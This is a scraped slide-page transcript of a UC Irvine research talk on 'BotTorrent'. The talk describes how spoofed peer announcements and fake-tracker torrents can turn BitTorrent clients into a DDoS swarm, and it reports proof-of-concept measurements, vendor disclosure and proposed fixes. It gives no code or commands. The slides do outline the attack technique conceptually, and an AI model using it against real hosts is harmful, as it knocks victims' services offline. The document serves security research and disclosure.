Presentation is loading. Please wait.

Presentation is loading. Please wait.

BotTorrent: Misusing BitTorrent to Launch DDoS Attacks Karim El Defrawy, Minas Gjoka, Athina Markopoulou UC Irvine.

Published byLetitia Gardner Modified over 9 years ago

Similar presentations

Presentation on theme: "BotTorrent: Misusing BitTorrent to Launch DDoS Attacks Karim El Defrawy, Minas Gjoka, Athina Markopoulou UC Irvine."— Presentation transcript:

1 BotTorrent: Misusing BitTorrent to Launch DDoS Attacks Karim El Defrawy, Minas Gjoka, Athina Markopoulou UC Irvine

2 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

3 Introduction oIn 2006, 60% of Internet traffic was due to peer-to-peer (P2P) protocols (Cache Logic) oBitTorrent is more than 35% by end of 2006 (Cache Logic) oMininova torrent search engine hit 2 billion downloads (Mininova - June 13 th 2007)

4

5 P2P traffic is rising

6

7 BitTorrent is responsible for a significant amount of P2P traffic

8 P2P based DDoS attacks recently observed o announced on May 14 th 2007 observing an increase in P2P based DDoS attacks o Attack based on the direct connect (DC) P2P system o Attack involved over 300 000 IPs o http://www.prolexic.com/news/20070514-alert.php

9 P2P based DDoS attacks recently observed o announced on May 14 th 2007 observing an increase in P2P based DDoS attacks o Attack based on the direct connect (DC) P2P system o Attack involved over 300 000 IPs o http://www.prolexic.com/news/20070514-alert.php P2P DDoS is already happening !

10 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

11 How BitTorrent works? - User publishes torrents - Set up a tracker to coordinate the download

12 How BitTorrent works? - User publishes torrents - Set up a tracker to coordinate the download 1- Users download torrents

13 How BitTorrent works? - User publishes torrents - Set up a tracker to coordinate the download 1- Users download torrents 2- Users’ clients contact tracker to join swarm and get list of peers in swarm

14 How BitTorrent works? - User publishes torrents - Set up a tracker to coordinate the download 1- Users download torrents 2- Users’ clients contact tracker to join swarm and get list of peers in swarm 3- Download different parts of file from different peers

15 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

16 Different attacks Entity FakedBT ModeRequirements Report Fake PeerCentralized Tracker Mode Send a spoofed message to tracker announcing victim as peer Report Fake TrackerCentralized Tracker Mode Publish torrents pointing to victim as a tracker (multi-tracker) Report Fake PeerDHT ModeSend fake BT PING message to DHT network spoofing source address of victim

17 Different attacks Entity FakedBT ModeRequirements Report Fake PeerCentralized Tracker Mode Send a spoofed message to tracker announcing victim as peer Report Fake TrackerCentralized Tracker Mode Publish torrents pointing to victim as a tracker (multi-tracker) Report Fake PeerDHT ModeSend fake BT PING message to DHT network spoofing source address of victim

18 How an attack faking tracker works? - Attacker publishes fake torrents with multiple tracker entries (or single) - Set up a tracker to report high number of seeders and leechers for these torrents

19 How an attack faking tracker works? - Attacker publishes fake torrents with multiple tracker entries (or single) - Set up a tracker to report high number of seeders and leechers for these torrents 1- Users download torrents with fake trackers pointing to victim

20 How an attack faking tracker works? - Attacker publishes fake torrents with multiple tracker entries (or single) - Set up a tracker to report high number of seeders and leechers for these torrents 1- Users download torrents with fake trackers pointing to victim 2- Clients contact victim in hope of starting the download

21 How an attack faking tracker works? - Attacker publishes fake torrents with multiple tracker entries (or single) - Set up a tracker to report high number of seeders and leechers for these torrents 1- Users download torrents with fake trackers pointing to victim 2- Clients contact victim in hope of starting the download ….

22 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

23 Experiment Setup o Victim machine: Pentium 2, 512 Mbps RAM, Debian Linux, 100Mbps Ethernet, running a light HTTP server o Modified tracker reports a fake (high) number of seeders and leechers to search engine o Publish fake torrents on search engines o Wait ….

24 Proof of concept attack results Exp. # # Torrents Ports AttackedThroughput (Kbps)Total Unique # Hosts TCP Conn. Avg/sec New Host Interarrival Time (sec) Open (Freq)ClosedAvg a Max a I101 (1)662.77127.225331753.937.89 II251 (10)10137.78520.4551271400.743.62 III251 (1)501132.97380.3863201580.882.31 IV251 (50) + 1 (1)49+201176.69482.8580461440.173.44 a Excluding the initial transient period (6 hours) of the experiment

25 Number of TCP connections per second

26 Attack throughput

27 Amount of traffic from clients

28 Distribution of sources in the IP address space

29 o Attack sources in 2433 ASs on the Internet o Attack sources in 12424 announced BGP prefixes Mapping attack sources to ASs and BGP prefixes

30 Attack ports

31 Related Work oAttack using Overnet : poison around 7000 files to be effective (Naoumov - 2006) oAttack faking client: poison swarms of 1119 torrents to generate several thousand TCP connections (Cheung Sia - 2006) oAttack faking tracker is more effective: tracker is a central point in the architecture

32 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

33 We contacted: oBitTorrent and Bram Cohen oSearch Engines: Mininova, Pirate Bay, BitTorrent Monster oClients developers: Azureus, Bitcomet oProlexic oResponse from Azureus developers only Reporting the problem

34 Solutions oHandshake between clients and trackers similar to the one between clients. oClients exchange view of trackers similar to exchanging view of peers. oMechanism to identify and trace the seeders of the fake torrents (based on hashes).

35 Outline o Introduction o How BitTorrent works o Using BitTorrent to launch DDoS attacks o Experiment details and results o Can we fix BitTorrent to prevent such attacks? o Summary

36 Summary oPresented misusing BitTorrent to launch DDoS attacks oProof of concept attack implementation oAnalyzed characteristics of the attack oProposed fixes to BitTorrent to detect and prevent such attacks oCurrently implementing fixes

37 Questions ?

38 Thank you! keldefra@uci.edu mgjoka@uci.edu athina@uci.edu

39 Distribution of IPs on BGP Prefixes

40 Distribution of IPs on ASs

41 Unique hosts per second

Download ppt "BotTorrent: Misusing BitTorrent to Launch DDoS Attacks Karim El Defrawy, Minas Gjoka, Athina Markopoulou UC Irvine."

Similar presentations

Denial of Service Attack History What is a Denial of Service Attack? Modes of Attack Performing a Denial of Service Attack Distributed Denial of Service.

Denial of Service Attack History What is a Denial of Service Attack? Modes of Attack Performing a Denial of Service Attack Distributed Denial of Service.
Peter R. Pietzuch Peer-to-Peer Computing – or how to make your BitTorrent downloads go faster... Peter Pietzuch Large-Scale Distributed.

Peter R. Pietzuch Peer-to-Peer Computing – or how to make your BitTorrent downloads go faster... Peter Pietzuch Large-Scale Distributed.
The BitTorrent Protocol

The BitTorrent Protocol
The BitTorrent Protocol. What is BitTorrent?  Efficient content distribution system using file swarming. Does not perform all the functions of a typical.

The BitTorrent Protocol. What is BitTorrent?  Efficient content distribution system using file swarming. Does not perform all the functions of a typical.
Incentives Build Robustness in BitTorrent Bram Cohen.

Incentives Build Robustness in BitTorrent Bram Cohen.
© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.

© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.
End-to-end Publishing Using Bittorrent. Bittorrent Bittorrent is a widely used peer-to- peer network used to distribute files, especially large ones It.

End-to-end Publishing Using Bittorrent. Bittorrent Bittorrent is a widely used peer-to- peer network used to distribute files, especially large ones It.
Clayton Sullivan PEER-TO-PEER NETWORKS. INTRODUCTION What is a Peer-To-Peer Network A Peer Application Overlay Network Network Architecture and System.

Clayton Sullivan PEER-TO-PEER NETWORKS. INTRODUCTION What is a Peer-To-Peer Network A Peer Application Overlay Network Network Architecture and System.
Chapter 2 Application Layer Computer Networking: A Top Down Approach, 5 th edition. Jim Kurose, Keith Ross Addison-Wesley, April 2009. A note on the use.

Chapter 2 Application Layer Computer Networking: A Top Down Approach, 5 th edition. Jim Kurose, Keith Ross Addison-Wesley, April A note on the use.
BitTorrent Join the swarm! BY: Joe Petruska. What is BitTorrent? a peer-to-peer file sharing protocol used for distributing large amounts of data.

BitTorrent Join the swarm! BY: Joe Petruska. What is BitTorrent? a peer-to-peer file sharing protocol used for distributing large amounts of data.
1 Is Content Publishing in BitTorrent Altruistic or Profit-Driven? 梁懿.

1 Is Content Publishing in BitTorrent Altruistic or Profit-Driven? 梁懿.
236349 Project in Computer Security Integrating TOR’s attacks into the I2P darknet Chen Avnery Amihay Vinter.

Project in Computer Security Integrating TOR’s attacks into the I2P darknet Chen Avnery Amihay Vinter.
CompSci 356: Computer Network Architectures Lecture 21: Content Distribution Chapter 9.4 Xiaowei Yang

CompSci 356: Computer Network Architectures Lecture 21: Content Distribution Chapter 9.4 Xiaowei Yang
Peer to Peer (P2P) Networks and File sharing. By: Ryan Farrell.

Peer to Peer (P2P) Networks and File sharing. By: Ryan Farrell.
DDoS Vulnerability Analysis of BitTorrent Protocol CS239 project Spring 2006.

DDoS Vulnerability Analysis of BitTorrent Protocol CS239 project Spring 2006.
Paul Solomine Security of P2P Systems. P2P Systems Used to download copyrighted files illegally. The RIAA is watching you… Spyware! General users become.

Paul Solomine Security of P2P Systems. P2P Systems Used to download copyrighted files illegally. The RIAA is watching you… Spyware! General users become.
Presented by Stephen Kozy. Presentation Outline Definition and explanation Comparison and Examples Advantages and Disadvantages Illegal and Legal uses.

Presented by Stephen Kozy. Presentation Outline Definition and explanation Comparison and Examples Advantages and Disadvantages Illegal and Legal uses.
1 Incentives Build Robustness in BitTorrent? Analysis on Bit Torrent Client performance By Jimmy Wong.

1 Incentives Build Robustness in BitTorrent? Analysis on Bit Torrent Client performance By Jimmy Wong.
Measurement and Diagnosis of Address Misconfigured P2P traffic Zhichun Li, Anup Goyal, Yan Chen and Aleksandar Kuzmanovic Lab for Internet and Security.

Measurement and Diagnosis of Address Misconfigured P2P traffic Zhichun Li, Anup Goyal, Yan Chen and Aleksandar Kuzmanovic Lab for Internet and Security.
P2P WeeSan Lee

P2P WeeSan Lee

Similar presentations

Ads by Google